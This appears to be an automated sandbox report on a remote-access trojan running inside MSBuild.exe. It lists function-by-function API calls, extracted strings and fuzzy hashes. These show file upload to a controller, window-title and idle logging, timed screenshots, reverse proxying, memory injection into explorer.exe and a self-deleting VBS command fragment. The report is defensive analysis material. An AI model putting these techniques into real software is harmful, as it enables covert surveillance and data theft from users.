                                                Function 00407DEF Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 325fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00407F4C
                                                • GetFileSizeEx.KERNEL32(00000000,00000000), ref: 00407FC2
                                                • __aulldiv.LIBCMT ref: 00407FE9
                                                • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 0040810D
                                                • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408128
                                                • CloseHandle.KERNEL32(00000000), ref: 00408200
                                                • CloseHandle.KERNEL32(00000000,00000052,00000000,?), ref: 0040821A
                                                • CloseHandle.KERNEL32(00000000), ref: 00408256
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: File$CloseHandle$CreatePointerReadSize__aulldiv
                                                • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $>G
                                                • API String ID: 1884690901-3066803209
                                                • Opcode ID: 7205d9af98df91b965123a054d585fa7c0d52e82773df9d6c890248cdbc6b411
                                                • Instruction ID: 222450ca6543349723abdfa1177da379b39b5876d7444fbb960ea0ab75079841
                                                • Opcode Fuzzy Hash: 7205d9af98df91b965123a054d585fa7c0d52e82773df9d6c890248cdbc6b411
                                                • Instruction Fuzzy Hash: DAB191316083409BC214FB25C892AAFB7E5AFD4314F40492EF885632D2EF789945C79B
                                                Function 00409E48 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 163sleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                • Sleep.KERNEL32(00001388), ref: 00409E62
                                                  • Part of subcall function 00409D97: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                  • Part of subcall function 00409D97: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                  • Part of subcall function 00409D97: Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                  • Part of subcall function 00409D97: CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                                                • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00409E9E
                                                • GetFileAttributesW.KERNEL32(00000000), ref: 00409EAF
                                                • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00409EC6
                                                • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00409F40
                                                  • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B633
                                                • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00465900,00000000,00000000,00000000), ref: 0040A049
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                • String ID: @CG$@CG$XCG$XCG$xAG$xAG
                                                • API String ID: 3795512280-3163867910
                                                • Opcode ID: 859471ff5ae44976aba126b0bcf56bf0f182264686a8061ac70fe12e31261d66
                                                • Instruction ID: b7dfc09a395f5416f32c5fe597dbb364f69b6ed32616efff49b152d1c9b912f4
                                                • Opcode Fuzzy Hash: 859471ff5ae44976aba126b0bcf56bf0f182264686a8061ac70fe12e31261d66
                                                • Instruction Fuzzy Hash: 30518D716043005ACB05BB72D866ABF769AAFD1309F00053FF886B71E2DF3D9D44869A
                                                Function 0045006D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • ___free_lconv_mon.LIBCMT ref: 004500B1
                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F300
                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F312
                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F324
                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F336
                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F348
                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F35A
                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F36C
                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F37E
                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F390
                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3A2
                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3B4
                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3C6
                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3D8
                                                • _free.LIBCMT ref: 004500A6
                                                  • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                  • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                • _free.LIBCMT ref: 004500C8
                                                • _free.LIBCMT ref: 004500DD
                                                • _free.LIBCMT ref: 004500E8
                                                • _free.LIBCMT ref: 0045010A
                                                • _free.LIBCMT ref: 0045011D
                                                • _free.LIBCMT ref: 0045012B
                                                • _free.LIBCMT ref: 00450136
                                                • _free.LIBCMT ref: 0045016E
                                                • _free.LIBCMT ref: 00450175
                                                • _free.LIBCMT ref: 00450192
                                                • _free.LIBCMT ref: 004501AA
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                • String ID:
                                                • API String ID: 161543041-0
                                                • Opcode ID: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                • Instruction ID: 6df0fc8d0da410edbfddc8482cd9dc810a80ebbb5b2f86b8c24a0bb33e3d08c7
                                                • Opcode Fuzzy Hash: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                • Instruction Fuzzy Hash: 96317235500B00AFEB20AA35D845B5B73E5AF42355F15841FF849E7292DF39AC98CB1A
                                                Function 00419128 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 174sleeptimeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • __EH_prolog.LIBCMT ref: 0041912D
                                                • GdiplusStartup.GDIPLUS(00473AF0,?,00000000), ref: 0041915F
                                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 004191EB
                                                • Sleep.KERNEL32(000003E8), ref: 0041926D
                                                • GetLocalTime.KERNEL32(?), ref: 0041927C
                                                • Sleep.KERNEL32(00000000,00000018,00000000), ref: 00419365
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                • String ID: XCG$XCG$XCG$time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                                • API String ID: 489098229-65789007
                                                • Opcode ID: a40dca5e55645720ca30496181093a362b70aa5652279529810e28997b425322
                                                • Instruction ID: b922dce7c629cfc9b1bb11cb74a08c0e3353b39699bf4d86e46594d10c943285
                                                • Opcode Fuzzy Hash: a40dca5e55645720ca30496181093a362b70aa5652279529810e28997b425322
                                                • Instruction Fuzzy Hash: 33519F71A002449ACB14BBB5C856AFE7BA9AB55304F00407FF84AB71D2EF3C5E85C799
                                                Function 0040428C Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 147networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                • connect.WS2_32(?,?,?), ref: 004042A5
                                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043CB
                                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043D5
                                                • WSAGetLastError.WS2_32(?,?,?,0040192B), ref: 004043E7
                                                  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                • API String ID: 994465650-2151626615
                                                • Opcode ID: 62f3c4882b49c5ff5d63aa71430f88bee7d31ae11dd357ee521aebef95a1510e
                                                • Instruction ID: b196b808fbc66b1ac8da6b4b51d7f626a0d3d22bc4cde50e21f83cd2c7739b74
                                                • Opcode Fuzzy Hash: 62f3c4882b49c5ff5d63aa71430f88bee7d31ae11dd357ee521aebef95a1510e
                                                • Instruction Fuzzy Hash: ED4128B1B00202A7CB04B77A8C5B66D7A55AB81368B40007FF901676D3EE7DAD6087DF
                                                Function 0040C66D Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 147COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,?,0040C67D), ref: 004116A9
                                                  • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF,?,0040C67D), ref: 004116BC
                                                  • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 00412679
                                                  • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 00412692
                                                  • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(?), ref: 0041269D
                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C6C7
                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C826
                                                • ExitProcess.KERNEL32 ref: 0040C832
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                • String ID: """, 0$.vbs$@CG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                • API String ID: 1913171305-390638927
                                                • Opcode ID: ca681db5516d972aef640dc773a40398a070aaf6ba3dfca6e9b2ec7f30141ac0
                                                • Instruction ID: a795a6540db69397e2c5d2b70f340dd787df27bacd58b350937fb1c0aad7b7c4
                                                • Opcode Fuzzy Hash: ca681db5516d972aef640dc773a40398a070aaf6ba3dfca6e9b2ec7f30141ac0
                                                • Instruction Fuzzy Hash: A2416D329001185ACB14F762DC56DFE7779AF50718F50417FF906B30E2EE386A8ACA99
                                                Function 0044F3E1 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free
                                                • String ID:
                                                • API String ID: 269201875-0
                                                • Opcode ID: 53d41fd9a7ee4e2989e4925aa528ca2cb03ad0a377c341b032d8e4e6b559b5a3
                                                • Instruction ID: 48066223020562dfe8895eb3edc0e70975ef38ab3c96fc6f1fb07286cb8ca08d
                                                • Opcode Fuzzy Hash: 53d41fd9a7ee4e2989e4925aa528ca2cb03ad0a377c341b032d8e4e6b559b5a3
                                                • Instruction Fuzzy Hash: 2BC15772D80204BFEB20DBA9CC82FDE77F89B45704F15416AFA04FB282D6749D458B58
                                                Function 00454982 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00454650: CreateFileW.KERNEL32(00000000,?,?,+JE,?,?,00000000,?,00454A2B,00000000,0000000C), ref: 0045466D
                                                • GetLastError.KERNEL32 ref: 00454A96
                                                • __dosmaperr.LIBCMT ref: 00454A9D
                                                • GetFileType.KERNEL32(00000000), ref: 00454AA9
                                                • GetLastError.KERNEL32 ref: 00454AB3
                                                • __dosmaperr.LIBCMT ref: 00454ABC
                                                • CloseHandle.KERNEL32(00000000), ref: 00454ADC
                                                • CloseHandle.KERNEL32(?), ref: 00454C26
                                                • GetLastError.KERNEL32 ref: 00454C58
                                                • __dosmaperr.LIBCMT ref: 00454C5F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                • String ID: H
                                                • API String ID: 4237864984-2852464175
                                                • Opcode ID: b64a76ded07e6414476391b57ad8ab2edcfe93df9d200e18b46d3283e817940b
                                                • Instruction ID: 324c09394b40af715295ff654573b8bda7a64cd12b4111e7ce26936e53f9a861
                                                • Opcode Fuzzy Hash: b64a76ded07e6414476391b57ad8ab2edcfe93df9d200e18b46d3283e817940b
                                                • Instruction Fuzzy Hash: B0A148329041044FDF19EF78D8427AE7BA0AB86319F14015EFC159F392DB398C86C75A
                                                Function 0040A3F4 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 158sleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                • __Init_thread_footer.LIBCMT ref: 0040A456
                                                • Sleep.KERNEL32(000001F4), ref: 0040A461
                                                • GetForegroundWindow.USER32 ref: 0040A467
                                                • GetWindowTextLengthW.USER32(00000000), ref: 0040A470
                                                • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040A4A4
                                                • Sleep.KERNEL32(000003E8), ref: 0040A574
                                                  • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                • String ID: [${ User has been idle for $ minutes }$]
                                                • API String ID: 911427763-3954389425
                                                • Opcode ID: a59f2f13793784003892e63950edf61f9792dfbe12456e4cbfe946a207096c8a
                                                • Instruction ID: 0ecdfa35f4bf358d0b6072dbfc0ad8fc4f94b2a12b5a089c7f39fa9b67fb4d59
                                                • Opcode Fuzzy Hash: a59f2f13793784003892e63950edf61f9792dfbe12456e4cbfe946a207096c8a
                                                • Instruction Fuzzy Hash: C451DF316083005BC614FB21D84AAAE7794BF84318F50493FF846A62E2EF7C9E55C69F
                                                Function 00413C67 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 155COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: 65535$udp
                                                • API String ID: 0-1267037602
                                                • Opcode ID: dd6860ede333d1e13d8ba8fd5b9e65b3a11d6160404ba42ca097fcd4ed7c504e
                                                • Instruction ID: a76ad32841e4dbbb66723cf4e0556afe3febbbe66cdf8f55616d13ac9502c32b
                                                • Opcode Fuzzy Hash: dd6860ede333d1e13d8ba8fd5b9e65b3a11d6160404ba42ca097fcd4ed7c504e
                                                • Instruction Fuzzy Hash: 9D4118716083019BD7209F29E905BAB7BD8EF85706F04082FF84197391E76DCEC186AE
                                                Function 0040C89E Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040CA04
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: LongNamePath
                                                • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                • API String ID: 82841172-425784914
                                                • Opcode ID: 2c32c8423f05266584aa4a08fe5fa9c2e4569a415b98fb848e0406cdb68be249
                                                • Instruction ID: 51cedb133b73bca78a9fc1065318242b3d6e678e936cb09da4a185c9a299c852
                                                • Opcode Fuzzy Hash: 2c32c8423f05266584aa4a08fe5fa9c2e4569a415b98fb848e0406cdb68be249
                                                • Instruction Fuzzy Hash: 39413A721442009BC214FB21DD96DAFB7A4AE90759F10063FB546720E2EE7CAA49C69F
                                                Function 00439361 Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393B9
                                                • GetLastError.KERNEL32(?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393C6
                                                • __dosmaperr.LIBCMT ref: 004393CD
                                                • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393F9
                                                • GetLastError.KERNEL32(?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439403
                                                • __dosmaperr.LIBCMT ref: 0043940A
                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401AD8,?), ref: 0043944D
                                                • GetLastError.KERNEL32(?,?,?,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439457
                                                • __dosmaperr.LIBCMT ref: 0043945E
                                                • _free.LIBCMT ref: 0043946A
                                                • _free.LIBCMT ref: 00439471
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                • String ID:
                                                • API String ID: 2441525078-0
                                                • Opcode ID: ab6d6df52fdda21e78bda597108ea35d8248e36eca260e6751756a241cd45372
                                                • Instruction ID: 902c93592471d116807dca9985149206a76c62e8192f2f9a6cc20a0486345b12
                                                • Opcode Fuzzy Hash: ab6d6df52fdda21e78bda597108ea35d8248e36eca260e6751756a241cd45372
                                                • Instruction Fuzzy Hash: F531F17140820ABBEF11AFA5DC449AF3B78EF09364F14016AF81066291DB79CC12DBA9
                                                Function 00404E52 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SetEvent.KERNEL32(?,?), ref: 00404E71
                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00404F21
                                                • TranslateMessage.USER32(?), ref: 00404F30
                                                • DispatchMessageA.USER32(?), ref: 00404F3B
                                                • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00473F80), ref: 00404FF3
                                                • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 0040502B
                                                  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                • String ID: CloseChat$DisplayMessage$GetMessage
                                                • API String ID: 2956720200-749203953
                                                • Opcode ID: 58bd3a0ae6df6a0bdf912a68ced102d79291154801096aaee71947f3f084d5d0
                                                • Instruction ID: a70547b48422ce96676d24762269450ce3f1821fc9982c67352fb5fd346d99ba
                                                • Opcode Fuzzy Hash: 58bd3a0ae6df6a0bdf912a68ced102d79291154801096aaee71947f3f084d5d0
                                                • Instruction Fuzzy Hash: F741BFB16043016BC714FB75DC5A8AE77A9ABC1714F40093EF906A31E6EF38DA05C79A
                                                Function 00416E27 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 107filesynchronizationCOMMON
                                                Download Yara Rule
                                                APIs
                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00465554), ref: 00416F24
                                                • CloseHandle.KERNEL32(00000000), ref: 00416F2D
                                                • DeleteFileA.KERNEL32(00000000), ref: 00416F3C
                                                • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00416EF0
                                                  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseDeleteExecuteFileHandleObjectShellSingleWaitsend
                                                • String ID: <$@$@FG$@FG$Temp
                                                • API String ID: 1107811701-2245803885
                                                • Opcode ID: 248dd396e914dd493217af7d7ad54a5765675a85d7a0f101f9c1831ea090813b
                                                • Instruction ID: 21bac8b1790940aaec7d6d8591dec239f7d6dde33bc15b5890dc9a9e7f2861e5
                                                • Opcode Fuzzy Hash: 248dd396e914dd493217af7d7ad54a5765675a85d7a0f101f9c1831ea090813b
                                                • Instruction Fuzzy Hash: E8319C319002099BCB04FBA1DC56AFE7775AF50308F00417EF906760E2EF785A8ACB99
                                                Function 00406616 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 98COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetCurrentProcess.KERNEL32(00474A28,00000000,BG3i@,00003000,00000004,00000000,00000001), ref: 00406647
                                                • GetCurrentProcess.KERNEL32(00474A28,00000000,00008000,?,00000000,00000001,00000000,004068BB,C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe), ref: 00406705
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CurrentProcess
                                                • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir$BG3i@
                                                • API String ID: 2050909247-4145329354
                                                • Opcode ID: ae628e6cf13d6acf56a74fe03314e9eaaf54e5537fc186528355c397fff7ef9b
                                                • Instruction ID: 423827b33d6c667fb1d0fc3afb55bdad30249121d517be796f0b9763ce16cf58
                                                • Opcode Fuzzy Hash: ae628e6cf13d6acf56a74fe03314e9eaaf54e5537fc186528355c397fff7ef9b
                                                • Instruction Fuzzy Hash: B2310871250700AFC300AB65EC45F6A37B8EB84716F11043EF50AE76E1EB79A8508B6D
                                                Function 00419C85 Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON
                                                Download Yara Rule
                                                APIs
                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419C94
                                                • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CAB
                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CB8
                                                • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CC7
                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CD8
                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CDB
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Service$CloseHandle$Open$ControlManager
                                                • String ID:
                                                • API String ID: 221034970-0
                                                • Opcode ID: 90cb661901cd042af288c915e3e3b558208b36f008bb68e694e16de296acffd5
                                                • Instruction ID: aaf019a9b49167a30595a2ca3c371567d0eeee9026f0995440eeab6e66ec65be
                                                • Opcode Fuzzy Hash: 90cb661901cd042af288c915e3e3b558208b36f008bb68e694e16de296acffd5
                                                • Instruction Fuzzy Hash: 00118632901218AFD7116B64EC85DFF3FACDB45BA5B000036F502921D1DB64DD46AAF5
                                                Function 00446DCB Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                Download Yara Rule
                                                APIs
                                                • _free.LIBCMT ref: 00446DDF
                                                  • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                  • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                • _free.LIBCMT ref: 00446DEB
                                                • _free.LIBCMT ref: 00446DF6
                                                • _free.LIBCMT ref: 00446E01
                                                • _free.LIBCMT ref: 00446E0C
                                                • _free.LIBCMT ref: 00446E17
                                                • _free.LIBCMT ref: 00446E22
                                                • _free.LIBCMT ref: 00446E2D
                                                • _free.LIBCMT ref: 00446E38
                                                • _free.LIBCMT ref: 00446E46
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                                • Instruction ID: b6db37451886405a3c03f61b360184b61b1678451e8b30ee63348233c964278a
                                                • Opcode Fuzzy Hash: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                                • Instruction Fuzzy Hash: F011E975100408BFEB01EF55C842CDD3B65EF46354B06C0AAF9086F222DA35DE649F85
                                                Function 00410314 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 192COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Eventinet_ntoa
                                                • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$>G
                                                • API String ID: 3578746661-4192532303
                                                • Opcode ID: 059a6457884d082c372b150a0b2831a4c1b83238499cd6d378c5b4a446b252df
                                                • Instruction ID: 9533851bb4e74ac183efc1d320b4a1154e984465ef7073577260c431c5a81f81
                                                • Opcode Fuzzy Hash: 059a6457884d082c372b150a0b2831a4c1b83238499cd6d378c5b4a446b252df
